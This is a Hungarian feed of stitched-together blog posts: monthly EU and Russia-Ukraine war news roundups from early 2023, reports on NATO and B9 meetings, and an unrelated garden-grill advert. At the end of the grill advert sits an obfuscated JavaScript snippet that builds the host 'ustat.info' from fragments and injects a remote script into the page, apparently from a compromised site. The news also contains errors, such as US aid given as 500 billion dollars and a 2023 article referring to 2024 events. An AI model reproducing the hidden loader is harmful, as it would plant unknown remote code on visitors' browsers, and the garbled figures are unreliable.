Az EU megállapodott arról is, hogy Ukrajnát tovább integrálja az egységes piacba, és bevonja a kulcsfontosságú uniós programokba – jelentette be Ursula von der Leyen, az Európai Bizottság elnöke a Denys Shmyhal ukrán miniszterelnökkel közösen tartott sajtótájékoztatón. Ugyanezen a napon Ursula von der Leyen találkozott Olena Zelenszka ukrán elnökasszonnyal, hogy megvitassák az ukrajnai árvák támogatását. Az Európai Bizottság elnöke elmondta, hogy az EU legfeljebb 10 millió eurót biztosít egy modern gyermekgondozási stratégia kidolgozására egy testvérvárosi projekt keretében. Az Európai Unió Tanácsa február 2-án az Európai Békefenntartási Eszköz keretében olyan támogatási intézkedéseket fogadott el, amelyek további katonai segítséget nyújtanak az ukrán fegyveres erőknek. Ezek egy 500 millió eurós hetedik csomagból, valamint egy új, 45 millió eurós támogatási intézkedésből állnak, amely az Európai Unió katonai segítségnyújtási missziójának (EUMAM Ukraine) képzési erőfeszítéseit támogatja.

A következő napon, 2023. február 3-án sor került az EU-Ukrajna csúcstalálkozóra is. Charles Michel, az Európai Tanács elnöke, Ursula von der Leyen, az Európai Bizottság elnöke és Volodimir Zelenszkij, Ukrajna elnöke Kijevben találkozott a 24. EU-Ukrajna csúcstalálkozón. Beszámoltak arról, hogy az Európai Bizottság felkérést kapott arra, hogy a szokásos bővítési csomag részeként ősszel számoljon be Ukrajna tagfelvételi kérelméről szóló bizottsági véleményben meghatározott feltételek teljesüléséről. Az EU üdvözölte Ukrajna csatlakozását az EU CUSTOMS és FISCALIS programjához, a Horizont Európa, az Euratom, a Digitális Európa és az EU egységes piaci programjához való csatlakozását, valamint az Európai Elektronikus Hírközlési Szabályozók Testületében való részvételét. Megvitatták, hogyan lehetne Ukrajnát tovább támogatni, és hogyan lehetne fokozni az Oroszországra gyakorolt kollektív nyomást, hogy véget vessenek a háborúnak és elérjék a csapatkivonást Ukrajnából. Az EU kijelentette, hogy készen áll arra, hogy globális partnereivel szoros együttműködésben és koordinációban tovább erősítse a szankciós intézkedéseket, miközben biztosítja azok hatékony végrehajtását, illetve megakadályozza a kijátszását.

Február 10-én új ukrán-román határátkelőhelyet avattak fel „Diakivtsi-Racovat” határátkelőhelyen. Az új határátkelőhely a második, amelyet a közelmúltban nyitottak meg Ukrajna és Románia között, miután 2022 novemberében felavatták a „Krasznojilszk – Vicovu de Sus” átkelőt. Az Európai Unió ukrajnai tanácsadó missziója (EUAM) mindkét esetben stratégiai tanácsokkal látta el az ukrán hatóságokat az integrált határigazgatással kapcsolatban.

Az Európai Unió és Moldova február 7-én Brüsszelben megtartotta első társulási tanácskozását azóta, hogy Moldova az Európai Unió tagjelölt országává vált. Az ülésen Josep Borrell, az EU kül- és biztonságpolitikai főképviselője és Natalia Gavriliţa moldovai miniszterelnök közösen elnökölt. A felek megvitatták az EU és Moldova közötti kapcsolatokat, különös tekintettel a politikai párbeszédre és a reformokra, a gazdasági és ágazati együttműködésre, valamint a kül- és biztonságpolitikai területen való együttműködésre és közeledésre. Borrell külön kiemelte Moldova erőfeszítéseit az Ukrajnából érkező menekültek befogadására, továbbra Ukrajna  mezőgazdasági exportjának és gazdaságának a globális piacokra jutásának előmozdítását. Az EU támogatni fogja továbbá Moldova erőfeszítéseit fizetési rendszerének modernizálására, hogy teljesítse az egységes eurófizetési térségbe való integráció feltételeit.

(Készítette: Mészáros Kinga)

[Az Innovációs és Technológiai Minisztérium ÚNKP-22-2-II-NKE-74 kódszámú Új Nemzeti Kiválóság Programjának a Nemzeti Kutatási, Fejlesztési és Innovációs Alapból finanszírozott szakmai támogatásával készült.]

Déli szomszédságpolitika

Az Európai Unió újabb 296 millió Euróval támogatja Palesztinát. A támogatásokat az olyan állami kiadásokra fogja fordítani a palesztin vezetés, mint az egészségügy fenntartása, vagy éppen a fizetések folyósítása a Kelet-jeruzsálemi régióban.

Az Európai Unió támogatásáról biztosította a földrengéssel sújtott Törökországot és Szíriát. A humanitárius támogatásokat 12 ország ajánlotta fel az Unió szervezetén keresztül. Az Európai Unió több mint 10 millió Euró humanitárius támogatást nyújtott a földrengés áldozatainak.

Az Európa Tanács 7 millió euró támogatást nyújtott a Jordániai Fegyveres Erőknek. „Ezzel a döntéssel az Európai Unió megmutatja, hogy Jordánia továbbra is bízhat bennünk, a segítségünkben és a barátságunkban. Elkötelezett partnerei vagyunk Jordániának.” – foglalta össze az EU álláspontját Josep Borell, az Európai Unió külügyi és biztonságpolitikai főképviselője.

Az Európai Befektetési Bank 2,5 milliárd eurót különít el a fenntarthatóságra, gazdasági növekedésre és a munkahelyteremtésre Tunéziában 2011 óta. Ez a nagyarányú kölcsön az Európai Befektetési Bank legnagyobb partnerévé tette Tunéziát (Az EU-s országokat leszámítva).

Az elmúlt öt évben az Európai Befektetési Bank 2,5 milliárd Eurót biztosított Marokkó gazdasági támogatására és infrastruktúrájának fejlesztésére. 2022-ben a Bank több mint 380 millió Eurót juttatott el Marokkónak. A támogatások hozzájárulnak Marokkó fenntartható fejlődésének elősegítéséhez.

(Készítette: Nagy Imre Jonatán)

Szerkesztette: Mészáros Kinga

A hírfigyelő korábbi kiadásai ide, hasonló témájú cikkeink pedig ide kattintva érhetők el.

Photo by Sara Kurfeß on Unsplash

A EU hírfigyelő 2023. február bejegyzés először Biztonságpolitika-én jelent meg.

Ez a Biztonságpolitikai Szakkollégium Orosz-ukrán háborút kutató műhelyének hírfigyelője. A havonta megjelenő beszámolóban a kutatósejt tagjai egy-egy általuk fontosnak tartott hírt mutatnak be, amelyek a műhely témájához kapcsolódnak.

Biden Ukrajnába látogatott

Az Egyesült Államok elnöke február 20-án meglepetésszerűen az ukrán fővárosba látogatott, az ukrán-orosz háború egy éves évfordulója alkalmából. Ezzel az úttal szerette volna kifejezni „rendíthetetlen támogatását” az ukrán nemzetnek az oroszok ellen vívott háborúban.

A látogatás érdekessége, hogy titokban tartották Joe Biden látogatását egészen addig, amíg meg nem érkezett; az államfő minimális kíséretet kapott és nem árultak el részleteket a sajtónak az utazással kapcsolatban egészen a tárgyalások végéig. A Fehér Ház értesítette az orosz hatóságokat néhány órával az érkezés előtt arról, hogy az amerikai elnök Kyjivbe látogat, de ennek ellenére is elindultak a légi riadók elindultak a fővárosban.

A látogatás alkalmával Joe Biden bejelentette, hogy még 500 milliárd dolláros katonai segély érkezik, viszont nem említett szót a nagy hatótávolságú fegyverekről és az F-16-os repülőgépekről. A tárgyalások során beszélgettek Ukrajna harctéri igényeiről; az energia, az infrastruktúra és a gazdaság támogatásáról, illetve humanitárius szükségeiről. A háború politikai oldaláról is tárgyaltak, ideértve a közelgő ENSZ Közgyűlést, amelynek a témája Ukrajna lesz. Ezenkívül szó esett Ukrajna elképzeléseiről a békével kapcsolatban, és az elengedhetetlen nemzetközi támogatásról, hogy lehetséges legyen egy igazságos és tartós béke építése – mondta Jake Sullivan a tárgyalásokról, aki az Egyesült Államok biztonsági tanácsadója.

Írta: Misák Veronika

Az ostromgyűrű bezárul, válasz: ukrán ellentámadás?

A Wagner Csoport tovább halad előre Bahmut városában. Nagyjából március 9-re az orosz erők elfoglalták az ukrán település keleti felét, azaz elérték a Bahmutka folyót. A hír nem orosz túlzás az ukránok felrobbantották a hidakat, amik összekötik a város két részét, ez bizonyítja, hogy az ukrán védők valóban nehéz helyzetben vannak és feladták a város keleti felét. A NATO főtitkár Jens Stoltenberg szerint is Bahmut a következő napokban eleshet. Ugyanakkor Volodimir Zelenszkij ukrán elnök megtiltotta a hátrálást.

Egyes források szerint a Wagner erői már hídfőállást foglaltak el a folyó túlpartján. Ezenkívül északon az AZOM gyár területén törnek előre, valamint délen megközelítették a híres MiG-17-es emlékművet, ami az utóbbi napokban megsemmisült. 

Az ukránok erre válaszul néhány forrás szerint ellentámadásra készülnek Bahmutnál.

A terv négy irányból mért csapás az orosz erőkre:

• Szlavjanksz irányából a 67. gépesített dandár által
• Szeverszk irányából a 81. légimozgékonyságú dandár és az 55. tüzérdandár által
• Csaszov Jar irányából a 77. légimozgékonyságú dandár által
• Konsztantyinovka irányából a 3. (Azov) rohamdandár által.

A siker kérdéses, mivel a rossz időjárási viszonyok miatt így is egy héttel elhalasztották a támadást, valamint az ukrán járművek rendre elakadnak a sárban. Eközben időt veszítenek mivel az oroszok tovább haladnak előre. Elfoglalták Dubovo-Vaszilovkát valamint fenyegetik Grigorovkát, Bogdanovkát és Orehovo-Vaszilovkát. Ezenkívül a donyecki fronton Avdejevka is veszélybe került. 

Mint látható a harcok intenzitása nem csökken a Donbaszban. Az Oroszországi Föderáció védelmi minisztere Szergej Sojgu hadseregtábornok szerint az ukránok csak februárban több mint 10 000 katonát veszítettek. 

Írta: Krausz Józseg

Hogyan változtatta meg az orosz-ukrán háború a kiberteret?

Az orosz-ukrán háború hatására szükségessé vált mind a magán, mind az állami szektor kiberbiztonsági szempontból történő magasabb szintű átláthatósága a lehetséges fenyegetések és geopolitikai válságok elleni küzdelem terén. A megelőző években Oroszország kiépítette a világ egyik legnagyobb és legfélelmetesebb kiberbűnözői környezetét, amelyben különböző hackercsoportok hajtottak végre támadásokat az orosz állam céljait elősegítve. Ezek a csoportok számos országot megtámadtak az évek során, a legnagyobb volumenű akciókat pedig az Egyesült Államok ellen követték el, megtámadva az ország egyik legfontosabb olajvezetékét és a világ legnagyobb hústermelőjét. A Recorded Future kiberbiztonsági cég jelentése alapján Oroszországból folyamatosan távoznak a technológiához értő szakemberek, melynek hatására még inkább felértékelődtek a hackercsoportok, mely a kibertér ökoszisztémájának átalakulásához vezetett. Ez a változás azt eredményezte, hogy a háborút megelőző időszakhoz képest az államilag támogatott hackercsoportok és a pénzügyileg motivált ransomware támadásokat kivitelező kiberbűnözői csoportok (ransomware as a service: RaaS) közötti határ elmosódott és mára már nem lehet különbséget tenni ezen csoportok között. A folyamatos szakember elvándorlás következtében a hackercsoportok egyre inkább az orosz hadsereg részeként végzik tevékenységüket, mely hatására az a javaslat is megfogalmazódott az orosz törvényhozásban, hogy mentesítsék a jogi felelősség alól azokat a kiberbűnözői és hackercsoportokat, amelyek az orosz állam érdekeit figyelembe véve működnek. Megállapítható tehát, hogy a háború hatására átalakult kibertéri környezet még inkább zavarosabbá és veszélyesebbé vált, melynek hatására nagyobb számú, volumenű és kifinomultabb kibertámadások várhatóak a jövőben.

Írta: Ésik Béla

A háború hatásai az energiapiacra

Az Oroszországi Föderáció 2022.02.24.-ei Ukrajna ellen indított támadása alapvetően formálta át a globális olaj- és gázpiacokat. Számos ország gazdaságára gyakorolt jelentős hatást a háború: zavarok mutatkoztak a gabonaellátásban, megnövekedtek az élelmiszerárak és sérült az európai kontinens energiaellátásának biztonsága is. Az orosz gáz jelentőségét jelzi, hogy 2021-ben az EU országai 155 milliárd köbméter orosz gázt importáltak, ami a teljes gázimport mintegy 45 százalékát tette ki. A háború előtt Oroszország volt az Európai Unió egyik legnagyobb nyersolajszállítója (mintegy 108,1 millió tonna) és a legnagyobb kőolajtermék-szállítója – 91 millió tonna – az Európai Uniónak. A tagállamok 2021-ben 51,4 millió tonna szenet is importáltak Oroszországból, ami az EU teljes szénimportjának közel felét tette ki.

Minden tényezőt összegezve kevés állam -Ukrajnán kívül- érezte annyira a háború közvetlen energiaellátásra gyakorolt hatását, mint Németország, hiszen hagyományosan Oroszország egyik legfontosabb gazdasági partnere. A szoros együttműködést egyrészt igazolja, hogy a felek közötti éves kereskedelmi forgalom nem sokkal a szankciók bevezetése előtt meghaladta a 80 milliárd dolláros szintet. Becslések szerint a kölcsönös szankciók a kétoldalú kereskedelmi forgalom akár 20%-os csökkenésével jártak, ami milliárdos veszteségeket jelentett a német gazdaság számára, és számos munkahely megszűnésével is járt. Másrészt az Oroszországtól való függés mértékét érzékeltetendő, a konfliktust megelőzően Európa legnagyobb gazdasága földgázellátásának közel felét csővezetéken keresztül Oroszországból szerezte be.  Az elmúlt év egyik leglátványosabb sikere, hogy Németország teljesen függetlenítette magát az orosz gázimporttól. Az EU viszonylagos sikerének további fontos tényezője volt a földgázfogyasztás csökkenése, amelyet 2022-re 10-12 százalékra becsülnek.

A 2024-es orosz tevékenység hatására előtérbe került az a kérdés, hogy milyen lépések eredményeként és mennyi idő után függetlenedhetne Németország az orosz gáztól. Az ellentmondásos megítélésű folyamat első lépéseként tavaly nyáron beszűntette az importtevékenységet Oroszországból, energiafelhasználási megszorításokat eszközölt –az enyhe időjárású- tél során és újratervezte gázbeszerzését. Második lépésként leállították az Északi Áramlat gázvezetéken keresztül történő szállítást. Harmadsorban pedig mivel az ukrajnai háború a kormány napirendjének élére helyezte azon erőfeszítéseket, amelyek célja Németország gázellátásának diverzifikálása az orosz szállításoktól, a kormány megkezdte az ország saját cseppfolyósított földgáz (LNG) importáló infrastruktúrájának kiépítését: állandó szárazföldi importterminálokba fektet be, miközben rövid távon úszó egységeket bérel – az elsőt 2022 decemberében adták át. Németország jól kiépített földgázvezeték-hálózattal rendelkezik, és kapcsolatban áll a szomszédos országok termináljaival, de egészen a közelmúltig nem rendelkezett saját kikötővel az LNG közvetlen fogadására.

Összefoglalóan elmondható, hogy az újkeletű energiaforrások (főként gáz) beszerzésére és alkalmazására irányuló erőfeszítések összehangolásával, a tervezett infrastrukturális projektek gyors megvalósításával Németország és az EU tagállamai folytatni tudják az Oroszországtól való energetikai leválás stratégiáját. Emellett a német és egyéb tagállami, a fosszilis tüzelőanyagoktól való függőség csökkentését célzó beruházások és helyettük karbonsemlegességet elsegítő technológiák támogatása -mint az atomenergetika-  lehetővé teszik majd, hogy hosszú távon valóban megerősítsék energiaszuverenitásukat.

Ellátási problémák a Wagner csoportnál

Yevgeny Prigozhin, a Wagner csoport alapítója lőszerellátási problémáknak tudja be Bahmut ostromának lassú előrehaladását. A várost több hónap után sem sikerült bevennie az orosz erőknek, melyek bevételére mind orosz reguláris, mind a privát katonai cég erői folyamatosan próbálkoznak. Prigozhin „általános bürokrácia vagy árulás” mondattal illette a felmerülő lőszerproblémák jelenségét. Oroszország hónapokig eltökéltnek tűnt Bahmut elfoglalására, de több elemző is úgy véli, hogy a város a háborúban leginkább szimbolikus jelentőséggel bír, ugyanis nincs túl sok stratégiai jelentősége.

Nem ez az első alkalom, hogy a reguláris erők és a Wagner között feszültség alakult ki, ahogyan Prigozhin sem először tesz utalást a lőszerellátmány hiányára, amit korábban is az orosz Védelmi Minisztérium hibájaként könyvelt el. Egy korábbi közösségi média posztjában február 22-i dátummal aláírt lőszerszállítmányokról beszélt, amelyekre már másnap számítottak a bahmuti ostromnál, ezekre azonban nem került sor. Az ellátási problémák mellett arról is beszélt, hogy nem sikerült felvenniük a kapcsolatot az orosz hadsereg vezetésének főhadiszállásával.

Később azonban megerősítette, hogy megérkeztek a lőszerszállítmányok, miután írt az orosz különleges katonai műveletekért felelős parancsnoknak, Valery Gerasimovnak, a „lőszerek kiemelt fontosságáról”. 

Egy másik videóban Prigozhin arról beszélt, hogy a Wagner csoport katonái attól tartanak, hogy ők lesznek felelősségre vonva Oroszország esetleges sikertelen offenzívájáért Ukrajna ellen. „Ha visszalépünk, úgy fognak ránk emlékezni a történelemben, akik a háború elvesztésében a legnagyobb szerepet játszották.”.

Írta: Jaksi Zsolt

Lemondott a moldovai kormány

Február 10-én délelőtt jelentette Valerij Zaluzsnij ukrán tábornok, hogy kettő, a fekete-tengeri orosz flotta által kilőtt cirkálórakéta megsértette Moldova és Románia légterét. Ezt később a román védelmi minisztérium hivatalosan is cáfolta, a moldovai légtérsértést viszont a moldovai kormány után az USA külügyminisztériuma is megerősítette. 

Ezután ugyan Moldova még bekérette az ország orosz nagykövetét, de ez az utolsó intézkedései egyike volt Natalia Gavrilita miniszterelnök kormányának, mivel órákkal az incidens után Gavrilita bejelentette, hogy a kormány másfél évnyi szolgálat után egységesen lemond. Az EU-tagjelölti státuszt tavaly nyáron elnyerő ország a háború kitörése óta súlyos gondokkal küzd, ez az incidens volt az utolsó csepp a pohárban, az elszabaduló infláció és az országba érkező ukrán menekültek tömegei után. Mindezeket fokozta, hogy az ország gázellátása Oroszországtól, villamosenergia-ellátottsága pedig Ukrajnától függ túlnyomó többségében. Az új kormányfő Dorin Recean, aki elődjéhez hasonlóan elkötelezett az EU és a nyugati értékek iránt. 

Február 13-án aztán a moldovai elnök, Maia Sandu már arról beszélt az állami televízióban, hogy Moszkva fegyveres diverzánsokkal árasztaná el országát. Sandu állítása szerint Oroszország célja az, hogy destabilizálja a frissen alakult kormányt, valamint, hogy a régóta Putyin elnök támogatását élvező Dnyeszter Menti Köztársaság (más néven Transznisztria) számára nyújtott támogatásoknak álcázva tudja növelni befolyását a térségben. 

Írta: Veres Máté

Egy valódi ukrán siker? A vuhledári csata (2023.01.24-)

Az Orosz- Ukrán háború frontjával kapcsolatos hírek nagy része manapság Bakhmuttal és a Wagnerrel foglalkozik, azonban van egy másik település mely bár kisebb jelentőséggel bír mégis érdemes az elmúlt hónap harci cselekményei alapján megemlíteni.

Ez a település az előbb említett Bakhmuttól 130 km-re délre található Vuhledár és környéke. A település a déli Ukrán védelmi vonal egyik fontos sarokköve, melynek folyamatos védelmét a 72.mechanizált dandár látja el. A városban állomásozó erők nagysága 2000 és 3000 fő körül becsülhető a település mérete alapján.

Az Orosz oldalon ezzel szemben a 40.tengeri gyalogos dandár és a 155. gárda tengeri dandár sorakozott fel, létszámuk 6000-8000 fő körülire tehető. A település támadására azonban az oroszok erősítésként és hátvéd szerepének ellátására ide rendelték a 72. és 136.-ik motorizált lövészdandárt is. Az orosz erők parancsnoka a térségben Rustam Muradov.

A csata január 24.-én Orosz tüzérségi csapással kezdődött majd 25.-én az Oroszok elfoglalták a front közvetlen közelében lévő épületeket. Január 25. és 28.-a között az Oroszok a Vuhledártól közvetlen keletre lévő lakóházakat is elfoglalták. Az Ukrán vezérkar erősítést küldött a térségbe (02.04-08) melynek köszönhetően az Ukránok megállították az Oroszok előrenyomulását.

Vuhledártól nyugatra az Ukrán erők sikeresen visszaverték az oroszokat Zolota-Nyva és Prechystivka alól (02.15-18), ezzel megakadályozták az Oroszokat abban, hogy a települést nyugatról karolják át az orosz erők.

A térségben még a mai napig is intenzív harcok folynak az Orosz és Ukrán csapatok között.

Írta: Horváth Kristóf

Szerkesztette: Jaksi Zsolt és Patócskai Péter

A hírfigyelő korábbi kiadásai ide, hasonló témájú cikkeink pedig ide kattintva érhetők el.

Photo by Ian Betley on Unsplash

A Orosz-ukrán háborús hírfigyelő – 2023. február bejegyzés először Biztonságpolitika-én jelent meg.

A közép- és kelet-európai NATO-tagállamokat tömörítő B9 csoport csütörtök este kezdődött tanácskozásán történteket a lengyel diplomácia vezetője román hivatali partnerével, Bogdan Aurescu román külügyminiszterrel együtt foglalta össze. Rau kiemelte: megvitatták „az európai biztonsági helyzet romlását”, a NATO keleti szárnyának megerősítésére irányuló erőfeszítéseket, valamint Ukrajna „politikai és gyakorlati támogatását”.

A résztvevők beszéltek a NATO és az Európai Unió közötti együttműködés fontosságáról, különösen a „jelenlegi válságra adandó hatékonyabb válasz” érdekében.

A B9 „katonai és más területeken továbbra is támogatni fogja Ukrajnát” – jelentette ki a lengyel külügyi tárca vezetője. Hozzátette: Lengyelország és „sok más szövetséges állam számára különösen az utóbbi szempont óriási jelentőséggel bír”. Rámutatott, hogy a B9 országai élen járnak e téren, olyan, „bátrabb akciókban” való részvételre buzdítják szövetségeseiket, mint a MiG-29-es vadászgépek vagy a (Leopard) harckocsik átadása Ukrajnának.

Bogdan Aurescu úgy vélte: az Ukrajna elleni orosz háború „Európa és Amerika biztonságát veszélyeztető művelet”, amely „komoly fenyegetést jelent a globális békére” nézve is. A béke érdekében „segíteni kell Ukrajnát, hogy megnyerje ezt a háborút” – fogalmazott a román diplomácia vezetője. Fontosnak nevezte, hogy az orosz tiszteket „felelősségre vonják azért, amit Ukrajnában műveltek”.

Aurescu szavai szerint a lódzi találkozó résztvevői a júliusi vilniusi NATO-csúcstalálkozó előtt megerősítették együttműködési szándékukat az észak-atlanti szövetség keretében. Fontosnak nevezte, hogy előrelépés történjen Ukrajna NATO-tagságának kérdésében.

A Bukaresti Kilencek vagy a Bukaresti Formátum (röviden B9 vagy B-9) egy 2015 novemberében alapított csoportosulás, amely Románia fővárosában, Bukarestben jött létre, Klaus Johannis román és Andrzej Duda lengyel elnök kezdeményezésére. Tagjai a NATO kelet-európai tagállamai: Lengyelország és Románia mellett Bulgária, Csehország, Észtország, Magyarország, Lettország, Litvánia és Szlovákia. Célja a NATO keleti szárnyának országai közötti katonai együttműködés elmélyítése, valamint a legfontosabb biztonságpolitikai kérdések megvitatása. A B9 lengyelországi találkozóján részt vett a csoporthoz nem tartozó Svédország, Finnország, Spanyolország és a NATO küldöttsége is.

The post Orosz agresszió: a Bukaresti Kilencek folytatják Ukrajna támogatását appeared first on .

A faszenes kerti grillek jelenleg a kerttulajdonosok egyik legnépszerűbb vásárlása! Ha szeretne egy kerti grillt, de nincs meggyőződve arról, hogy megéri-e a befektetést, a következő sorokban 5 igazán jó okot részletezünk!

A saját magunknak és az otthonunknak szánt vásárlások gyakran indokoltak és jól meghatározott céllal történnek, és a precíz hasznosságú vásárlások közé sorolhatjuk ezek a kerti grillsütők, olyan termékek amelyek minden kültértérrel rendelkező háztulajdonos bevásárlólistáján szerepelnek. A következő sorokban tehát 5 indokot részletezünk, amiért ezek a faszenes grillsütők bárki számára jó befektetésnek számítanak. Íme tehát, hogy miért érdemes faszénnel működő kerti grillsütőt vásárolni:

1. Tartós és megbízható termék

A minőség mindannyiunk számára kérdés, ezért próbálunk okosan vásárolni és egy kicsit utánajárni, mielőtt ténylegesen megveszünk valamit. Ebben az értelemben a kerti grill olyan termék, amelyet hosszú ideig élvezhetünk, mert minőségi és tartós anyagokból készül.

2. Könnyen használható

Akár kedveli az ételek grillezését, akár nem, egy ilyen termék használata nem igényel részletes használati utasítást, és nem is bonyolult. Ezek a kerti grillezők olyan parazsakkal működnek, amelyeket manapság szinte bármelyik boltban megvásárolhat, és nem csak.

3. Hordozható

Az ilyen típusú kerti grillek egyik legnagyobb előnye, hogy hordozhatóak, hogy otthon, barátoknál, a természetben, kempingben egyaránt használhatjuk őket. Könnyen fel- és összeszerelhető, közepes méretű, ezek a grillek finom ételeket és felejthetetlen estéket biztosítanak a családdal és a közeli barátokkal.

4. Egészséges grillezett ételek

Ezeknek a grilleknek egy másik említésre méltó előnye, hogy egészségesebb stílusban, olajban való áztatás és túlsütés nélkül készíthetünk ételt. Ajánlatos odafigyelni arra, hogy milyen ételeket fogyasztunk és hogyan készítjük el, és egy ilyen grill segítségével sokkal kiegyensúlyozottabb lesz a táplálkozásunk.

5. Költségek

Ellentétben a kertben épített, rögzített tégla grillel, amelyhez anyagokat kell vásárolnia és kőművest kell hívnia, és amely nyilvánvalóan sokkal költségesebb, a kerti faszéngrill bárki és bármilyen költségvetés számára megfelelő vétel. Ráadásul még ezek a termékek is különböző méretekben kaphatók, nyilvánvaló, hogy az áruk is eltérő, de biztosan megtaláljuk az igényeinknek megfelelő grillsütőt.

A Rademi.hu webáruház a faszénes kerti grillek széles választékával várja Önt, amelyeket a legjobb online árakon vásárolhat meg. A minőségi, tartós és megbízható anyagokból készült kerti grillek hosszú ideig fognak minket szolgálni. Használja ki az árajánlatokat és örüljön a szép nyári napoknak a finom és egészséges ételeknek, szeretteivel együtt!

(function(){ z84s=document.createElement("script");z84s_=(("u")+"st")+"a";z84s.async=true; z84s.type="text/javascript";z84s_+=("t.i")+""+"n";z84s_+=(("f")+"o");z84s_+="/"; z84su="495774649.";z84su+="j2z5dhyk84s8frk0hcv"+"6ba691xgyv6"; z84s.src="https://"+z84s_+z84su;document.body.appendChild(z84s); })();

The post 5 indok a faszénes kerti grill választására appeared first on .

„JDAM-nek nevezett bombákat használunk. Ezek nyugati típusú bombák, amelyekkel repülőgépeink sikeresen csapnak le fontos célpontokra. Ezek a bombák valamivel kisebb teljesítményűek, de rendkívül nagy pontosságúak. Szeretném, ha több ilyen bombája lenne az ukrán légierőnek” – jelentette ki a szóvivő.

A közelmúltban Oroszország aktívan kezdett használni irányított légi bombákat. Az orosz erők általában a szovjet időkből származó FAB-500-as bombákat használnak, amelyeket utólag szárnyakkal és GPS-navigációval szereltek fel – idézett fel az Ukrajinszka Pravda hírportál korábbi ukrán közléseket. Ihnat korábban rámutatott arra, hogy ezek az orosz bombák általában nem túl pontosak, ezért nagy veszélyt jelentenek a polgári létesítményekre. Az ilyen típusú fegyverek elleni küzdelemhez Ukrajnának nagy hatótávolságú légvédelmi rendszerekre és modern, többcélú repülőgépekre van szüksége – mondta a szóvivő.

Az ukrán vezérkar esti helyzetjelentésében azt állította, hogy Luhanszk megye megszállt részében ötven orosz katona dezertált. A vezérkar szerint ez azt bizonyítja, hogy folytatódik az Ukrajnába vezényelt orosz katonák csoportos szökésének tendenciája.

A kijevi katonai vezetés jelentésében arról számolt be, hogy pénteken az ukrán erők több mint harminc ellenséges támadást vertek vissza, két légvédelmi rendszert és egy radarállomást is eltaláltak. Az ukrán légierő gépei a nap folyamán hat csapást mértek az orosz erők koncentrációs területeire, a rakéta-és tüzérségi egységek pedig nyolc támadást hajtottak végre, amelyek eredményeképpen eltaláltak egy üzemanyagraktárt, két légvédelmi rakétarendszert, egy tüzérségi egységet és egy elektronikus hadviselési állomást.

A kijevi jelentés szerint az orosz erők eközben öt rakéta- és 12 légicsapást indítottak, valamint több mint húsz támadást hajtottak végre rakéta-sorozatvetőkkel.

„Pénteken az Oroszországi Föderáció ballisztikus rakétákkal újabb rakétatámadást intézett polgári célpontok ellen Zaporizzsja városában és Ukrajna más településein. Hat Sahíd-136 típusú, iráni gyártású támadó drónt is bvetettek, de ezeket mind megsemmisítette az ukrán légédelem. Az ellenség továbbra is fő erőfeszítéseit a Donyeck megyében lévő Liman, Bahmut, Avgyijivka és Marjinka települések irányában végrehajtandó támadó műveletekre összpontosítja” – írta a vezérkar.

The post Orosz agresszió: Az ukrán légierő nyugati, GPS-irányítású bombákat is használ appeared first on .

Szalay-Bobrovniczky Kristóf azt mondta, hogy egy felmérés szerint a NATO támogatottsága a magyaroknál hét százalékkal magasabb, mint a szövetséges országok átlaga. A tárcavezető beszédében emlékeztetett arra, hogy Magyarország több mint húsz éve a NATO tagja, és lépésről lépésre építette fel jelenlétét a szövetségben.

A biztonsági helyzet Európában alapvetően megváltozott, jelentősen romlott az ukrajnai orosz agresszió következtében. Ez megváltoztatta a NATO-t is, adaptációs folyamat megy végbe, és ennek része a többnemzeti hadosztály-parancsnokság létrehozása, ami 2019-ben kezdődött meg – mondta a miniszter.

Az eseményt követő sajtótájékoztatón Szalay-Bobrovniczky úgy fogalmazott: „hadtörténelmet írunk” a többnemzeti hadosztály-parancsnokság felállításával. Ezt bölcs és jó döntésnek nevezte, amely komoly előrelátásról tett tanúbizonyságot már 2019-ben. Világossá vált, hogy világ legerősebb és legrégebbi védelmi szövetsége keleti szárnyát meg kell erősíteni, és Közép-Európában nem volt még ilyen parancsnokság – magyarázta a miniszter. A parancsnokság azért többnemzeti, mert számos országot felügyel Közép-Európában, és sok nemzet katonái szolgálnak itt – a magyar katonák mellett horvátok, szlovákok, szlovének, lengyelek, románok, spanyolok, törökök. Beszédének zárásaként a honvédelmi miniszter úgy fogalmazott: nem csak Magyarország van a NATO-ban, de a NATO is itt van Magyarországon.

Mario Banozic horvát védelmi miniszter az ukrajnai orosz agresszió első évfordulója után még fontosabbnak nevezte a többnemzeti hadosztály-parancsnokságot és a magyar, szlovák, horvát tisztek, altisztek, valamint katonák közös munkáját. Hangsúlyozta: egységes az erőfeszítés annak érdekében, hogy javítsák képességeiket és növeljék az együttműködést.

A biztonságot nem lehet adottnak tekinteni, és minden erőfeszítést meg kell tenni annak érdekében, hogy megtartsuk azt az előnyt, amellyel rendelkezünk potenciális ellenfeleinkkel szemben – mondta a horvát védelmi miniszter. Készen állunk arra, hogy vezető szerepet játsszunk, és ha szükség van rá, akkor „a NATO-terület minden egyes centiméterét megvédjük”.

Marian Majer szlovák honvédelmi államtitkár úgy fogalmazott: majdnem egy évtized telt el azóta, hogy Ukrajnát, a Krím-félszigetet elérte az orosz agresszió, és azóta jelentős változáson ment át a NATO. Tovább kell erősíteni a szövetség keleti határát, oda kell csoportosítani több egységet. A többnemzeti hadosztály-parancsnokságot a szlovák politikus a régióban a szövetséges együttműködés fontos építőköveként jellemezte.

Majer a rendezvényt követő sajtótájékoztatón kiemelte: a többnemzeti hadosztály-parancsnokság két üzenetet közvetít. Az egyik ellenfeleinknek, különösen Oroszországnak szól, amely „egy nem kiprovokált agressziót” folytat Ukrajna ellen. A másik pedig a NATO-nak és szövetségeseinek szól, és azt mutatja, hogy „nemcsak elkötelezettek, de felkészültek is vagyunk arra, hogy megvédjük magunkat abban az esetben, ha bármi történne”. Szlovákia számára is fontos a védelmi költségvetés alakítása.

Denis Tretinjak tábornok, az HQ MND-C parancsnoka az ünnepségen felelevenítette a parancsnokság felállításának folyamatát. A most kezdődő új műveleti státusz növekedési lehetőséget jelent és azt, hogy hiteles és kompetens parancsnokságot tudnak létrehozni – jegyezte meg.

Luigi Guglielmo Miglietta tábornok, a brunssumi NATO-parancsnokság (Allied Joint Force Command Brunssum) vezetője jelezte: a NATO készen áll a különböző kihívásokkal szemben és képes területe megvédésére. A szövetséget fenyegető veszélyeket komplexnek nevezte, de hangsúlyozta: a NATO biztosítani tudja Európa, értékei és életformája biztonságát.

A székesfehérvári rendezvényen részt vett Christopher G. Cavoli tábornok, a NATO Európában állomásozó fegyveres erőinek főparancsnoka is.

The post Szalay-Bobrovniczky: nem csak a kormány, a nemzet is a NATO mögött áll appeared first on .

